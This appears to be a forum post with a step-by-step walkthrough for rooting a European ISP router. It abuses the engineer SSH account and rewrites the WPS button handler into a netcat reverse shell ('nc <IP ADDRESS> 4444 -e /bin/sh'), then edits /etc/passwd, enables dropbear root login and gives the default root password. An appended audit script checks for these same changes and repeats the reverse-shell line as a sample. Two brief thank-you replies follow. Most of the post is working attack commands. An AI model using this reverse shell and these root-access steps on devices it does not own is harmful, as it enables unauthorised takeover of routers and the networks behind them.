Unfortunately this only works on European models that have SSH enabled and an engineer account available.
Tested working on firmware revision 17.2.0278.
It's a bit more involved than the older methods, but here goes:
First, set up a machine listening with netcat (make a note of its IP):
nc -lvvp 4444
Next, set up the WPS button to connect back to your listening machine. Log into the engineer account over SSH; the password is printed on the router's label as the access code.
get uci.button.button.@wps.handler
set uci.button.button.@wps.handler 'nc <IP ADDRESS> 4444 -e /bin/sh'
get uci.button.button.@wps.handler
Push the WPS button on the router (on the 589 it's the one on the side, visible in the image up top).
Congrats, you now have a root shell.
Once logged in you can set up root login via SSH. The following reads the passwd file, changes the root shell from /bin/false to /bin/ash, then prints the file again:
cat /etc/passwd
sed -i "1s/\/bin\/false/\/bin\/ash/" /etc/passwd
cat /etc/passwd
Make sure the second passwd output shows the correct root shell.
Next, configure dropbear to allow root login via SSH:
uci set dropbear.lan.RootLogin='1'
uci set dropbear.lan.RootPasswordAuth='on'
uci commit
You then have to restart dropbear:
/etc/init.d/dropbear restart
The root password is root :)
Log in via SSH and set a new root password:
root@dsldevice:~# passwd root
New password:
Retype password:
Password for root changed by root
Finally, set the WPS button handler back using UCI:
uci set button.wps.handler='wps_button_pressed.sh'
uci commit
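As an added check that is not part of the original post: a small POSIX shell audit that reports whether the three changes made above (WPS handler replaced, root shell changed, dropbear RootLogin enabled) are still present, so you can confirm a device is back to stock or spot these modifications on one you did not make them on. It assumes the stock handler is wps_button_pressed.sh, as restored above, and that root's default shell is /bin/false; the passwd contents and IP address are constructed samples.

```shell
#!/bin/sh
# Added audit example, not part of the original post. It checks text you feed it
# for the three changes the walkthrough makes. On the router itself you would pass
# `uci get button.wps.handler`, the contents of /etc/passwd and
# `uci get dropbear.lan.RootLogin`; the values below are constructed samples.

STOCK_HANDLER='wps_button_pressed.sh'

# Constructed sample /etc/passwd contents (not taken from any real device).
STOCK_PASSWD='root:x:0:0:root:/root:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false'
MODIFIED_PASSWD='root:x:0:0:root:/root:/bin/ash
nobody:*:65534:65534:nobody:/var:/bin/false'

# Print the login shell of the root account from passwd text given as $1.
root_shell() {
    printf '%s\n' "$1" | awk -F: '$1 == "root" { print $7 }'
}

# audit HANDLER PASSWD_TEXT ROOTLOGIN
# Prints one FINDING line per deviation from the stock state and, on the last
# line, the number of findings (0 means the device is back to stock).
audit() {
    count=0
    if [ "$1" != "$STOCK_HANDLER" ]; then
        echo "FINDING: WPS handler is not $STOCK_HANDLER: $1"
        count=$((count + 1))
    fi
    shell=$(root_shell "$2")
    if [ "$shell" != "/bin/false" ]; then
        echo "FINDING: root login shell is '$shell', expected /bin/false"
        count=$((count + 1))
    fi
    if [ "$3" = "1" ]; then
        echo "FINDING: dropbear.lan.RootLogin is enabled"
        count=$((count + 1))
    fi
    echo "$count"
}

# Count only, for scripting: audit_count HANDLER PASSWD_TEXT ROOTLOGIN
audit_count() {
    audit "$@" | tail -n 1
}

# Stand-alone demonstration: a stock device, then one with all three changes applied
# (192.0.2.10 is a documentation address used as a constructed sample).
audit "$STOCK_HANDLER" "$STOCK_PASSWD" 0
audit 'nc 192.0.2.10 4444 -e /bin/sh' "$MODIFIED_PASSWD" 1
```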
This is neat. Thanks, mate.
Thanks dude